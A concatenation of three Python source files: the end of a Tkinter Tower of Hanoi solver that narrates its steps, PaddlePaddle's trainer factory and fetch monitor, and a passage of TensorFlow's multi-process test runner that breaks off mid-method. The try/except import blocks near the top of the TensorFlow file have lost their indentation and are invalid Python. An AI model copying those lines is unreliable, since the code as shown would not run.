            self.viewer.user_pause('')

            # Subgoal 1: move the n-1 smaller disks out of the way.
            self.viewer.set_active_index(0, level + 1)
            self.viewer.display_text(prefix + "Recursing on first subgoal...")
            self.viewer.user_pause('')
            actions1 = self.dohanoi(n-1, using, frm, to)
            self.viewer.add_completed_index(0, level + 1)

            # Subgoal 2: move the remaining (largest) disk directly.
            self.viewer.set_active_index(1, level + 1)
            self.viewer.display_text(prefix + "Handling second subgoal...")
            self.viewer.display_text(prefix + "Adding action: Move remaining disk from {0} to {1}".format(frm, to))
            self.viewer.user_pause('')
            actions2 = self.move(frm, to)
            self.viewer.add_completed_index(1, level + 1)

            # Subgoal 3: move the n-1 disks back on top of it.
            self.viewer.set_active_index(2, level + 1)
            self.viewer.display_text(prefix + "Recursing on third subgoal...")
            self.viewer.user_pause('')
            actions3 = self.dohanoi(n-1, to, using, frm)
            self.viewer.add_completed_index(2, level + 1)

            plan = actions1 + actions2 + actions3
            self.viewer.display_text(prefix + "Subgoals are completed...")
            self.viewer.user_pause('')
            self.viewer.remove_last_item_viewer(level + 1)
            # Fixed: previously re-concatenated the three lists instead of
            # returning the `plan` already built above.
            return plan
        else:
            # Base case: a single disk moves directly.
            self.viewer.display_text(prefix + "Entering base case...")
            self.viewer.display_text(prefix + "Adding action: Move single disk from {0} to {1}".format(frm, to))
            actions2 = self.move(frm, to)
            self.viewer.user_pause('')
            return actions2

    def solve(self):
        """Worker-thread entry point: run the narrated solve for its side
        effects (the returned action list is discarded here)."""
        # Give the Tk UI a moment to come up before narrating.
        time.sleep(0.1)
        self.generate_action_list()

    def generate_action_list(self):
        """Drive the full narrated solve and return BEGIN + plan + END."""
        self.viewer.add_item_viewer("Goal", ['Move %s disks from %s to %s' % (self.num_disks, Pole1, Pole3)], -1, [])
        self.viewer.display_text('Starting to Solve!')
        self.viewer.user_pause('')
        self.viewer.set_active_index(0, 0)
        actions = self.dohanoi(self.num_disks, Pole3, Pole1, Pole2)
        self.viewer.add_completed_index(0, 0)
        self.viewer.display_text('Problem Solved! Please click Execute Plan or close the window to continue!')
        self.viewer.user_pause('')
        return BEGIN + actions + END
def main():
    """Build the Tk UI, run the solver on a background daemon thread so the
    Tk main loop stays responsive, and wait for the worker after the UI
    loop exits."""
    root = tk.Tk()
    root.title('Problem Reduction')
    viewer = TreeViewer(root)
    solver = RecursiveSolver(viewer)
    # Daemon thread: dies with the process if the window is closed early.
    worker = threading.Thread(target=solver.solve)
    worker.daemon = True
    worker.start()
    tk.mainloop()
    worker.join()
# Script entry point.
if __name__ == "__main__":
    main()
|
trainer_factory.py | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defination of TrainerFactory."""
import threading
import time
import logging
import numpy as np
from paddle.fluid.log_helper import get_logger
# Module-level logger shared by the classes below (FetchHandlerMonitor
# warnings in particular).
local_logger = get_logger(
    __name__, logging.INFO, fmt='%(asctime)s-%(levelname)s: %(message)s')

# NOTE: TrainerFactory resolves trainer/device-worker classes by name via
# globals(), so every class imported here must stay importable by name.
from .trainer_desc import MultiTrainer, DistMultiTrainer, PipelineTrainer, HeterXpuTrainer, PSGPUTrainer, HeterPipelineTrainer
from .device_worker import Hogwild, DownpourSGD, DownpourLite, Section, DownpourSGDOPT, HeterSection
from .framework import Variable
from multiprocessing import Process, Manager

# Public API of this module.
__all__ = ["TrainerFactory", "FetchHandlerMonitor"]
class TrainerFactory(object):
    """
    Create trainer and device worker.
    If opt_info is not None, it will get configs from opt_info,
    otherwise create MultiTrainer and Hogwild.
    """

    def __init__(self):
        pass

    def _create_trainer(self, opt_info=None):
        """Build and configure a trainer/device-worker pair.

        Args:
            opt_info (dict|None): optimizer/runtime options. When falsy, a
                default MultiTrainer + Hogwild pair is returned. Otherwise
                the "trainer"/"device_worker" entries name the classes to
                instantiate (resolved from this module's globals) and the
                remaining keys are forwarded to the trainer's setters.

        Returns:
            The configured trainer (with its device worker attached).
        """
        trainer = None
        device_worker = None
        if not opt_info:
            # default is MultiTrainer + Hogwild
            trainer = MultiTrainer()
            device_worker = Hogwild()
            trainer._set_device_worker(device_worker)
        else:
            # Classes are looked up by name, so they must be imported into
            # this module's namespace (see the imports at the top).
            trainer_class = opt_info.get("trainer", "MultiTrainer")
            device_worker_class = opt_info.get("device_worker", "Hogwild")
            trainer = globals()[trainer_class]()
            device_worker = globals()[device_worker_class]()

            # for debug tools
            if opt_info is not None:
                # Forward each present option to the matching trainer setter.
                # Keys guarded with `is not None` so explicit falsy values
                # (0, False, "") are still applied.
                if opt_info.get("trainers") is not None:
                    trainer._set_trainers(opt_info["trainers"])
                if opt_info.get("trainer_id") is not None:
                    trainer._set_trainer_id(opt_info["trainer_id"])
                if opt_info.get("dump_slot") is not None:
                    trainer._set_dump_slot(opt_info["dump_slot"])
                if opt_info.get("mpi_rank") is not None:
                    trainer._set_mpi_rank(opt_info["mpi_rank"])
                if opt_info.get("mpi_size") is not None:
                    trainer._set_mpi_size(opt_info["mpi_size"])
                if opt_info.get("dump_fields") is not None and len(
                        opt_info.get("dump_fields")) != 0:
                    trainer._set_dump_fields(opt_info["dump_fields"])
                if opt_info.get("dump_fields_path") is not None and len(
                        opt_info.get("dump_fields_path")) != 0:
                    trainer._set_dump_fields_path(opt_info["dump_fields_path"])
                if opt_info.get("dump_file_num") is not None:
                    trainer._set_dump_file_num(opt_info["dump_file_num"])
                if opt_info.get("dump_converter") is not None:
                    trainer._set_dump_converter(opt_info["dump_converter"])
                if opt_info.get("dump_param") is not None and len(
                        opt_info.get("dump_param")) != 0:
                    trainer._set_dump_param(opt_info["dump_param"])
                if opt_info.get("worker_places") is not None:
                    trainer._set_worker_places(opt_info["worker_places"])
                if opt_info.get("use_ps_gpu") is not None:
                    trainer._set_use_ps_gpu(opt_info["use_ps_gpu"])
                if opt_info.get("enable_random_dump") is not None:
                    trainer._set_enable_random_dump(opt_info[
                        "enable_random_dump"])
                if opt_info.get("dump_interval") is not None:
                    trainer._set_dump_interval(opt_info["dump_interval"])
                if opt_info.get("random_with_lineid") is not None:
                    trainer._set_random_with_lineid(opt_info[
                        "random_with_lineid"])

                # fleet_desc is shared by the trainer AND the device worker.
                if "fleet_desc" in opt_info:
                    device_worker._set_fleet_desc(opt_info["fleet_desc"])
                    trainer._set_fleet_desc(opt_info["fleet_desc"])
                    if opt_info.get("use_cvm") is not None:
                        trainer._set_use_cvm(opt_info["use_cvm"])
                    if opt_info.get("no_cvm") is not None:
                        trainer._set_no_cvm(opt_info["no_cvm"])
                    if opt_info.get(
                            "scale_sparse_gradient_with_batch_size") is not None:
                        trainer._set_scale_sparse_grad_with_batch_size(opt_info[
                            "scale_sparse_gradient_with_batch_size"])
                    if opt_info.get("scale_datanorm") is not None:
                        trainer._set_scale_datanorm(opt_info["scale_datanorm"])
                    if opt_info.get("adjust_ins_weight") is not None:
                        trainer._set_adjust_ins_weight(opt_info[
                            "adjust_ins_weight"])
                    if opt_info.get("copy_table") is not None:
                        trainer._set_copy_table_config(opt_info["copy_table"])
                    if opt_info.get("check_nan_var_names") is not None:
                        trainer._set_check_nan_var_names(opt_info[
                            "check_nan_var_names"])
                    if opt_info.get("loss_names") is not None:
                        trainer._set_loss_names(opt_info["loss_names"])
            trainer._set_device_worker(device_worker)
        return trainer
class FetchHandlerMonitor(object):
    """Definition of FetchHandlerMonitor class, it's for fetch handler.

    Runs a background thread that, every ``handler.period_secs`` seconds,
    pulls the variables named in ``handler.var_dict`` out of ``scope``,
    converts them to numpy arrays and passes them to ``handler.handler``.
    """

    def __init__(self, scope, handler):
        self.fetch_instance = handler
        self.fetch_thread = threading.Thread(
            target=self.handler_launch_func, args=(scope, self.fetch_instance))
        # Guards `running`, which is read by the thread and written by
        # start()/stop().
        self.running_lock = threading.Lock()
        self.running = False

    def handler_launch_func(self, scope, handler):
        """Thread body: sleep in 1s ticks until the period elapses, then
        fetch the configured variables and invoke the user handler."""
        fetch_instance = handler
        period_secs = fetch_instance.period_secs

        # Map variable name -> user-supplied key, warning about entries
        # that are not Variables (they collapse onto a "None.var" slot).
        var_name_to_key = {}
        for key in fetch_instance.var_dict:
            if isinstance(fetch_instance.var_dict[key], Variable):
                var_name_to_key[fetch_instance.var_dict[key].name] = key
            else:
                local_logger.warning("the value of {} is not a Variable".format(
                    key))
                var_name_to_key["None.var"] = key

        elapsed_secs = 0
        while True:
            # Hold the lock for the whole iteration so stop() cannot flip
            # `running` while a fetch is in flight. Fixed: the original
            # broke out of the loop without releasing the lock, leaving it
            # held forever; `with` guarantees release on break too.
            with self.running_lock:
                if not self.running:
                    break
                if elapsed_secs < period_secs:
                    # TODO(guru4elephant): needs customized condition
                    time.sleep(1)
                    elapsed_secs += 1
                else:
                    elapsed_secs = 0
                    fetch_dict = {}
                    for var_name in var_name_to_key:
                        var = scope.find_var(var_name)
                        fetch_dict[var_name] = var
                        if var is None:
                            local_logger.warning("{} value currently not available".
                                                 format(var_name_to_key[var_name]))
                    res_dict = {}
                    for var_name in fetch_dict:
                        user_name = var_name_to_key[var_name]
                        if fetch_dict[var_name] is None:
                            res_dict[user_name] = None
                            continue
                        res_dict[user_name] = fetch_dict[var_name].get_tensor()

                        # LoD tensors cannot be represented as plain numpy
                        # arrays, so refuse them explicitly.
                        lod = res_dict[user_name].lod()
                        if len(lod) > 0:
                            raise RuntimeError("Some of your fetched tensors \
                                                hold LoD information. \
                                                They can not be completely cast \
                                                to Python ndarray. We can \
                                                not return LoDTensor itself directly, \
                                                please choose another targets")
                        if res_dict[user_name]._is_initialized():
                            res_dict[user_name] = np.array(res_dict[user_name])
                        else:
                            res_dict[user_name] = None
                    fetch_instance.handler(res_dict)

    def start(self):
        """
        start monitor,
        it will start a monitor thread.
        """
        with self.running_lock:
            self.running = True
        # `setDaemon` is deprecated; assign the attribute instead.
        self.fetch_thread.daemon = True
        self.fetch_thread.start()

    def stop(self):
        """Signal the monitor thread to exit at its next iteration."""
        with self.running_lock:
            self.running = False
|
multi_process_runner.py | # Lint as: python3
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Multi-process runner for testing purpose."""
import collections
import contextlib
import json
import os
import signal
import sys
import threading
import time
import unittest
import weakref
from absl import logging
import six
from six.moves import queue as Queue
from tensorflow.python import tf2
from tensorflow.python.compat import v2_compat
from tensorflow.python.distribute import multi_worker_util
from tensorflow.python.distribute import multi_process_lib
from tensorflow.python.eager import context
from tensorflow.python.framework import test_util
from tensorflow.python.util.tf_export import tf_export
multiprocessing = multi_process_lib.multiprocessing
# pylint: disable=g-import-not-at-top
try:
# `faulthandler` is not available in py2.
import faulthandler
except ImportError:
faulthandler = None
# TODO(b/150264776): Remove after resolving CI issue.
try:
import dill
except ImportError:
dill = None
# TODO(b/150264776): Remove after resolving CI issue.
try:
import tblib.pickling_support
# For pickling traceback objects.
tblib.pickling_support.install()
except ImportError:
pass
# _ProcessStatusInfo contains process status information. When is_successful
# attribute is True, the subprocess has ended successfully, or if False, the
# exception stack trace info is stored in exc_info to pass on to parent process
# to be re-raised. return_value carries the value `fn` returned, if any.
_ProcessStatusInfo = collections.namedtuple(
    '_ProcessStatusInfo',
    ['task_type', 'task_id', 'is_successful', 'exc_info', 'return_value'])

# Information returned from a successful MultiProcessRunner run.
MultiProcessRunnerResult = collections.namedtuple('MultiProcessRunnerResult',
                                                  ['return_value', 'stdout'])

# TestEnvironment is carried into each subprocess so it can configure itself
# (TF_CONFIG, v2/eager behavior, GPU visibility) before running user code.
# visible_gpus: If not None, CUDA_VISIBLE_DEVICES is set to visible_gpus.
TestEnvironment = collections.namedtuple('TestEnvironment', [
    'task_type', 'task_id', 'cluster_spec', 'rpc_layer', 'grpc_fail_fast',
    'v2_enabled', 'executing_eagerly', 'visible_gpus'
])

# Resources for communication between worker processes and the main process.
#
# `process_status_queue` is used by `multi_process_runner` internally for
# communication from subprocesses to the parent process for whether it's been
# successful, and if not what the error stack trace is.
# `parent_to_sub_queue` is used for communications from parent to subprocess.
# Currently this is only used to terminate subprocesses.
# TODO(rchao): Remove this once subprocess is terminated by SIGKILL.
# `streaming_pipe_w` is to stream stdout and stderr from subprocesses to parent
# process.
# `barrier` is a barrier for the party of all subprocesses.
Resources = collections.namedtuple('Resources', [
    'process_status_queue', 'parent_to_sub_queue', 'streaming_pipe_w', 'barrier'
])

# Default time out sec is selected so that it's handled before the default
# "medium" timeout of the test runs.
_DEFAULT_TIMEOUT_SEC = 200

# The timeout in seconds to wait to force kill a child process. When a child
# process times out we first try to SIGTERM it so that it has a chance to dump
# stacktraces. However dumping stacktrace can take a long time.
_FORCE_KILL_WAIT_SEC = 30
class MultiProcessRunner(object):
  """A utility class to start multiple processes to simulate a cluster.

  We need to use multiple processes to simulate a cluster in TF 2.0 tests
  because TF 2.0 has some process-global data structures that have to be
  separated by processes. We also need child processes to test out our fault
  tolerance because shutting down a standard TensorFlow server within its
  process is not supported.

  Note: the main test program that uses this runner class must run main program
  via `test_main` defined in this file. Using this runner in non-test binaries
  is not supported yet.

  This class is not thread-safe. Child processes will inherit TF2 behavior flag.
  """

  def __init__(self,
               fn,
               cluster_spec,
               rpc_layer=None,
               max_run_time=None,
               grpc_fail_fast=None,
               stream_output=True,
               return_output=False,
               use_dill_for_args=True,
               daemon=False,
               dependence_on_chief=True,
               auto_restart=False,
               share_gpu=True,
               args=None,
               kwargs=None):
    """Instantiation of a `MultiProcessRunner`.

    Args:
      fn: Function to be run on child processes. This will be run on processes
        for all task types.
      cluster_spec: Dict for cluster spec. The utility function
        `tf.__internal__.distribute.multi_process_runner.create_cluster_spec`
        can be conveniently used to create such dict. The following is an
        example of cluster with three workers and two ps's.
        {"worker": ["worker0.example.com:2222",
                    "worker1.example.com:2222",
                    "worker2.example.com:2222"],
         "ps": ["ps0.example.com:2222",
                "ps1.example.com:2222"]}
      rpc_layer: RPC layer to use. Default value is 'grpc'.
      max_run_time: `None` or integer. If not `None`, child processes are forced
        to exit at approximately this many seconds after this utility is called.
        We achieve this through `signal.alarm()` api. Note that this is best
        effort at Python level since Python signal handler does not get executed
        when it runs lower level C/C++ code. So it can be delayed for
        arbitrarily long time. If any of the child process is still running when
        `max_run_time` is up, they will be force-terminated and an
        `UnexpectedSubprocessExitError` may be raised. If `None`, child
        processes are not forced to exit.
      grpc_fail_fast: Whether GRPC connection between processes should fail
        without retrying. Defaults to None, in which case the environment
        variable is not explicitly set.
      stream_output: True if the output/error from the subprocesses should be
        streamed to be printed in parent process' log. Defaults to True.
      return_output: If True, the output/error from the subprocesses should be
        collected to be attached to the resulting namedtuple returned from
        `join()`. The list of output can be retrieved via `stdout` attribute.
        Defaults to False.
      use_dill_for_args: Whether to use dill to pickle `args` and `kwargs`. dill
        can pickle more objects, but doesn't work with types in
        `multiprocessing` library like `Mutex`.
      daemon: Whether to start processes as daemons.
      dependence_on_chief: Whether to terminates the cluster if the chief exits.
        If auto_restart is True, it only terminates the cluster if the chief
        exits with a zero exit code.
      auto_restart: Whether to automatically restart processes that exit with
        non-zero exit code.
      share_gpu: Whether to share GPUs among workers. If False, each worker is
        assigned different GPUs in a roundrobin fashion. This should be True
        whenever possible for better test execution coverage; some situations
        that need it to be False are tests that runs NCCL.
      args: Positional arguments to be sent to `fn` run on subprocesses.
      kwargs: Keyword arguments to be sent to `fn` run on subprocesses.

    Raises:
      RuntimeError: if `multi_process_runner.test_main()` is not called.
      ValueError: if there are more than one chief in the `cluster_spec`.
      SkipTest: if thread sanitizer is enabled (which is incompatible with MPR).
    """
    if test_util.is_tsan_enabled():
      raise unittest.SkipTest(
          'ThreadSanitizer is not compatible with MultiProcessRunner.')

    assert cluster_spec is not None
    if 'chief' in cluster_spec and len(cluster_spec['chief']) > 1:
      raise ValueError('If chief exists in the cluster, there must be at most '
                       'one chief. Current `cluster_spec` has {} chiefs.'
                       .format(len(cluster_spec['chief'])))
    _check_initialization()
    if not callable(fn):
      raise ValueError('fn is not a callable')

    self._fn = fn
    self._cluster_spec = cluster_spec
    self._rpc_layer = rpc_layer or 'grpc'
    self._max_run_time = max_run_time
    self._grpc_fail_fast = grpc_fail_fast
    self._stream_output = stream_output
    # TODO(rchao): Revisit return_output argument to consider other solution.
    self._return_output = return_output
    self._dependence_on_chief = dependence_on_chief
    self._use_dill_for_args = use_dill_for_args
    self._daemon = daemon
    self._auto_restart = auto_restart
    self._args = args or ()
    self._kwargs = kwargs or {}

    self._share_gpu = share_gpu
    self._total_gpu = len(context.context().list_physical_devices('GPU'))

    # Child processes should have the same v2 and eager behavior.
    self._v2_enabled = tf2.enabled()
    self._executing_eagerly = context.executing_eagerly()

    self._joined = False
    self._process_lock = threading.Lock()
    # Guarded by self._process_lock.
    self._processes = {}
    # Record which processes are terminated. Due to a bug in Python<3.7,
    # terminated processes return 255 exit code, which should cause an exception
    # in join().
    # https://bugs.python.org/issue30589
    # Guarded by self._process_lock.
    self._terminated = set()
    self._reading_threads = []

    self._manager = manager()
    self._process_status_queue = self._manager.Queue()
    self._parent_to_sub_queue = self._manager.Queue()
    # The barrier has one party per task in the cluster so that all
    # subprocesses can rendezvous on it.
    parties = sum(len(addresses) for addresses in self._cluster_spec.values())
    self._barrier = self._manager.Barrier(parties)

    # We use a queue to collect outputs from worker processes since it's thread
    # safe.
    self._streaming_queue = self._manager.Queue()

    self._watchdog_thread = None

  def set_args(self, args=None, kwargs=None):
    # Replace the stored fn arguments; falsy values keep the existing ones.
    self._args = args or self._args
    self._kwargs = kwargs or self._kwargs

  def _continuously_readline_from_sub(self, pipe_r, task_type, task_id):
    """Function to continuously read lines from subprocesses."""
    with os.fdopen(pipe_r.fileno(), 'r', closefd=False) as reader:
      for line in reader:
        # Prefix each streamed line with its originating task, e.g.
        # "[worker-0]:   ...".
        task_string = '[{}-{}]:'.format(task_type, task_id)
        formatted_line = '{} {}'.format(task_string.ljust(14), line)
        if self._stream_output:
          # TODO(rchao): Use a lock here to ensure the printed lines are not
          # broken.
          print(formatted_line, end='', flush=True)
        if self._return_output:
          self._streaming_queue.put(formatted_line)

  def _start_subprocess_and_reading_thread(self,
                                           task_type,
                                           task_id,
                                           cluster_spec=None,
                                           fn=None,
                                           args=None,
                                           kwargs=None):
    """Start a subprocess and a thread the reads lines from the subprocess."""

    if dill is None:
      raise unittest.SkipTest(
          'TODO(b/150264776): Resolve dependency issue in CI')

    cluster_spec = cluster_spec or self._cluster_spec
    visible_gpus = None
    if not self._share_gpu and self._total_gpu > 0:
      # Assign GPUs in a roundrobin fashion.
      id_in_cluster = multi_worker_util.id_in_cluster(cluster_spec, task_type,
                                                      task_id)
      worker_count = multi_worker_util.worker_count(cluster_spec, task_type)
      visible_gpus = list(range(id_in_cluster, self._total_gpu, worker_count))

    test_env = TestEnvironment(
        task_type=task_type,
        task_id=task_id,
        cluster_spec=cluster_spec,
        rpc_layer=self._rpc_layer,
        grpc_fail_fast=self._grpc_fail_fast,
        v2_enabled=self._v2_enabled,
        executing_eagerly=self._executing_eagerly,
        visible_gpus=visible_gpus,
    )
    pipe_r, pipe_w = multiprocessing.Pipe(duplex=False)
    resources = Resources(
        process_status_queue=self._process_status_queue,
        parent_to_sub_queue=self._parent_to_sub_queue,
        streaming_pipe_w=pipe_w,
        barrier=self._barrier,
    )
    if fn is None:
      fn, args, kwargs = self._fn, self._args, self._kwargs
    # Always use dill to pickle fn so that we support more callable
    # types, e.g. lambda.
    fn = dill.dumps(fn, dill.HIGHEST_PROTOCOL)
    if self._use_dill_for_args:
      args = dill.dumps(args, dill.HIGHEST_PROTOCOL)
      kwargs = dill.dumps(kwargs, dill.HIGHEST_PROTOCOL)

    p = _Process(
        test_env=test_env,
        target=_ProcFunc(),
        args=(resources, test_env, fn, args, kwargs, self._use_dill_for_args),
        daemon=self._daemon)
    p.start()
    self._processes[(task_type, task_id)] = p
    # Starting (or restarting) clears any previous "terminated" record.
    self._terminated.discard((task_type, task_id))

    # For each subprocess, we dedicate a thread continuously reading lines
    # from them.
    thread = threading.Thread(  # pylint: disable=unexpected-keyword-arg
        target=self._continuously_readline_from_sub,
        args=(pipe_r, task_type, task_id))
    thread.start()
    self._reading_threads.append(thread)

    # Lazily (re)start the watchdog; it exits on its own when all subprocesses
    # have exited.
    if self._watchdog_thread is None or not self._watchdog_thread.is_alive():
      self._watchdog_thread = threading.Thread(target=self._process_watchdog)
      self._watchdog_thread.start()

  def start(self):
    """Starts processes, one for each task in `cluster_spec`.

    Note that this is best effort by the applicable multiprocessing library,
    and it may take up to seconds for a subprocess to be successfully started.
    """
    with self._process_lock:
      if self._processes:
        raise ValueError('MultiProcessRunner already started.')
      if self._joined:
        # NOTE(review): implicit string concatenation here produces
        # '...afterMultiProcessRunner...' with no separating space.
        raise ValueError('cannot start new processes after'
                         'MultiProcessRunner.join() is called')

      for task_type, addresses in self._cluster_spec.items():
        for task_id, _ in enumerate(addresses):
          self._start_subprocess_and_reading_thread(task_type, task_id)

    # TODO(rchao): Remove the need of using SIGALRM if possible. At this time,
    # without this the tests become very flaky.
    if self._max_run_time is not None:

      def handler(signum, frame):
        del signum, frame
        self.terminate_all()

      signal.signal(signal.SIGALRM, handler)
      signal.alarm(self._max_run_time)

  def start_in_process_as(self, as_task_type, as_task_id):
    """Start the processes, with the specified task run in main process.

    This is similar to `start()` except that the task with task_type
    `as_task_type` and task_id `as_task_id` is run in the main process.
    This method is particularly useful when debugging tool such as `pdb` is
    needed in some specific task. Note that since this method is blocking until
    that specific task exits, additional actions would need a thread to be
    called:

    ```python
    def fn():
      # user code to be run
      import pdb; pdb.set_trace()

    def follow_ups():
      time.sleep(5)
      mpr.start_single_process(
          task_type='evaluator',
          task_id=0)

    mpr = multi_process_runner.MultiProcessRunner(
        fn,
        multi_worker_test_base.create_cluster_spec(
            has_chief=True, num_workers=1))
    threading.Thread(target=follow_ups).start()
    mpr.start_in_process_as(as_task_type='chief', as_task_id=0)
    mpr.join()
    ```

    Note that if `return_output=True`, the logs/stdout by task
    run by the main process is not available in result.stdout.

    Args:
      as_task_type: The task type to be run in the main process.
      as_task_id: The task id to be run in the main process.
    """
    if self._processes:
      raise ValueError('MultiProcessRunner already started.')
    with self._process_lock:
      if self._joined:
        raise ValueError('cannot start new processes after'
                         'MultiProcessRunner.join() is called')
      # Start every task except the one designated to run in this process.
      for task_type, addresses in self._cluster_spec.items():
        for task_id, _ in enumerate(addresses):
          if not (task_type == as_task_type and task_id == as_task_id):
            self._start_subprocess_and_reading_thread(task_type, task_id)

    _set_tf_config(as_task_type, as_task_id, self._cluster_spec,
                   self._rpc_layer)
    # Blocks until fn returns; runs in the main process for debuggability.
    self._fn(*self._args, **self._kwargs)

  def start_single_process(self,
                           task_type,
                           task_id,
                           cluster_spec=None,
                           fn=None,
                           args=None,
                           kwargs=None):
    """Starts a single process.

    This starts a process in the cluster with the task type, task id, and the
    process function (`fn`). If process function is `None`, the function
    provided at `__init__` will be used. If `cluster_spec` is `None`, the
    cluster spec provided at `__init__` will be used.

    TODO(rchao): It is meant that all subprocesses will be updated with the new
    cluster spec, but this has yet to be implemented. At this time only the
    newly started subprocess picks up this updated cluster spec.

    Args:
      task_type: The task type.
      task_id: The task id.
      cluster_spec: The cluster spec to be used on the newly started
        process. If `None`, the cluster spec provided at `__init__` will be
        used.
      fn: The process function to be run on the newly started
        process. If specified, specify `args` and `kwargs` as well. If `None`,
        the function provided at `__init__` will be used.
      args: Optional positional arguments to be supplied in `fn`.
      kwargs: Optional keyword arguments to be supplied in `fn`.
    """
    with self._process_lock:
      if self._joined:
        raise ValueError('cannot start new processes after'
                         'MultiProcessRunner.join() is called')
      self._start_subprocess_and_reading_thread(
          task_type,
          task_id,
          cluster_spec=cluster_spec,
          fn=fn,
          args=args or (),
          kwargs=kwargs or {})

  def _queue_to_list(self, queue_to_convert):
    """Convert `queue.Queue` to `list`."""
    list_to_return = []
    # Calling `queue.empty()` is not reliable.
    while True:
      try:
        list_to_return.append(queue_to_convert.get(block=False))
      except Queue.Empty:
        break
    return list_to_return

  def _get_process_statuses(self):
    # One worker may have multiple statuses. We only keep the last one.
    statuses = {}
    for status in self._queue_to_list(self._process_status_queue):
      statuses[(status.task_type, status.task_id)] = status
    return statuses

  def get_process_id(self, task_type, task_id):
    """Returns the subprocess id given the task type and task id."""
    with self._process_lock:
      p = self._processes.get((task_type, task_id), None)
    return p.pid if p else None

  def get_process_exit_code(self, task_type, task_id):
    """Returns the subprocess exit code given the task type and task id.

    Args:
      task_type: The task type.
      task_id: The task id.

    Returns:
      The subprocess exit code; `None` if the subprocess has not exited yet.

    Raises:
      KeyError: If the corresponding subprocess is not found with `task_type`
        and `task_id`.
    """
    with self._process_lock:
      p = self._processes[(task_type, task_id)]
    return p.exitcode if p else None

  def process_exists(self, task_type, task_id):
    """Returns whether the subprocess still exists given the task type and id.

    Args:
      task_type: The task type.
      task_id: The task id.

    Returns:
      Boolean; whether the subprocess still exists. If the subprocess has
      exited, this returns False.
    """
    return self.get_process_exit_code(task_type, task_id) is None

  def _process_watchdog(self):
    """Simulates a cluster management system.

    - If auto_restart is True, it restarts processes that exit with a non-zero
      exit code. Note that when join() times out it overrides auto_restart to
      False.
    - If dependence_on_chief is True, it terminates all processes once the chief
      exits. If auto_restart is also True, it only terminates all processes if
      the chief exit with a zero exit code, otherwise it restarts the chief.

    This runs in self._watchdog_thread.
    """
    while True:
      time.sleep(1)
      with self._process_lock:
        chief = self._processes.get(('chief', 0), None)
        # Terminate the cluster when _dependence_on_chief is True if either:
        # - chief has exited with zero exit code.
        # - chief has exited with non-zero exit code and self._auto_restart is
        #   False.
        if chief and self._dependence_on_chief and chief.exitcode is not None:
          if chief.exitcode == 0 or (not self._auto_restart):
            for p in self._processes.values():
              # Give other processes a chance to exit on their own.
              p.join(timeout=3)
            self._terminate_all()
            for p in self._processes.values():
              p.join()
            return

        # Auto restart failed processes if self._auto_restart is True.
        if self._auto_restart:
          has_failure = False
          for (task_type, task_id), p in self._processes.items():
            if p.exitcode is not None and p.exitcode != 0:
              has_failure = True
              logging.info('Restarting failed %s-%d', task_type, task_id)
              self._start_subprocess_and_reading_thread(task_type, task_id)
          # Skip the all-exited check below: a restart just happened, so at
          # least one process is running again.
          if has_failure:
            continue

        # Exit the thread if all processes have exited at this point.
        if all(p.exitcode is not None for p in self._processes.values()):
          return

  def _reraise_if_subprocess_error(self, process_statuses):
    # Re-raise the first subprocess failure in the parent, attaching the
    # partial run result so callers can still inspect collected output.
    for process_status in process_statuses.values():
      assert isinstance(process_status, _ProcessStatusInfo)
      if not process_status.is_successful:
        process_status.exc_info[1].mpr_result = self._get_mpr_result(
            process_statuses)
        six.reraise(*process_status.exc_info)

  def join(self, timeout=_DEFAULT_TIMEOUT_SEC):
    """Joins all the processes with timeout.

    If any of the subprocesses does not exit approximately after `timeout`
    seconds has passed after `join` call, this raises a
    `SubprocessTimeoutError`.

    Note: At timeout, it uses SIGTERM to terminate the subprocesses, in order to
    log the stack traces of the subprocesses when they exit. However, this
    results in timeout when the test runs with tsan (thread sanitizer); if tsan
    is being run on the test targets that rely on timeout to assert information,
    `MultiProcessRunner.terminate_all()` must be called after `join()`, before
    the test exits, so the subprocesses are terminated with SIGKILL, and data
    race is removed.

    Args:
      timeout: optional integer or `None`. If provided as an integer, and not
      all processes report status within roughly `timeout` seconds, a
      `SubprocessTimeoutError` exception will be raised. If `None`, `join` never
      times out.

    Returns:
      A `MultiProcessRunnerResult` object, which has two attributes,
      `return_value` and `stdout`. `return_value` always contains a list of
      return values from the subprocesses, although the order is not meaningful.
      If `return_output` argument is True at `__init__`, `stdout` is available
      that contains a list of all messages from subprocesses' stdout and stderr.

    Raises:
      SubprocessTimeoutError: if not all processes report status approximately
        within `timeout` seconds. When this is raised, a
        `MultiProcessRunnerResult` object can be retrieved by
        `SubprocessTimeoutError`'s mpr_result attribute, which has the same
        structure as above 'Returns' section describes.
      UnexpectedSubprocessExitError: If any of the subprocesses did not exit
        properly (for example, they exit on SIGTERM or SIGKILL signal). When
        this is raised, a `MultiProcessRunnerResult` object can be retrieved by
        `UnexpectedSubprocessExitError`'s mpr_result attribute, which has the
        same structure as above 'Returns' section describes. If `max_run_time`
        is not `None`, it is expected that some subprocesses may be
        force-killed when `max_run_time` is up, and this is raised in those
        cases.
      Exception: if there is an Exception propagated from any subprocess. When
        this is raised, a `MultiProcessRunnerResult` object can be retrieved by
        `UnexpectedSubprocessExitError`'s mpr_result attribute, which has the
        same structure as above 'Returns' section describes.
    """
    if timeout and not isinstance(timeout, int):
      raise ValueError('`timeout` must be an integer or `None`.')
    with self._process_lock:
      if self._joined:
        raise ValueError("MultiProcessRunner can't be joined twice.")
      self._joined = True

    self._watchdog_thread.join(timeout)
    if self._watchdog_thread.is_alive():
      # Timeout. Force termination to dump worker processes stack trace.
      with self._process_lock:
        self._auto_restart = False
      logging.error('Timeout when joining for child processes. Terminating...')
      self.terminate_all(sig=signal.SIGTERM)
      # Wait for the processes to terminate by themselves first, so they have a
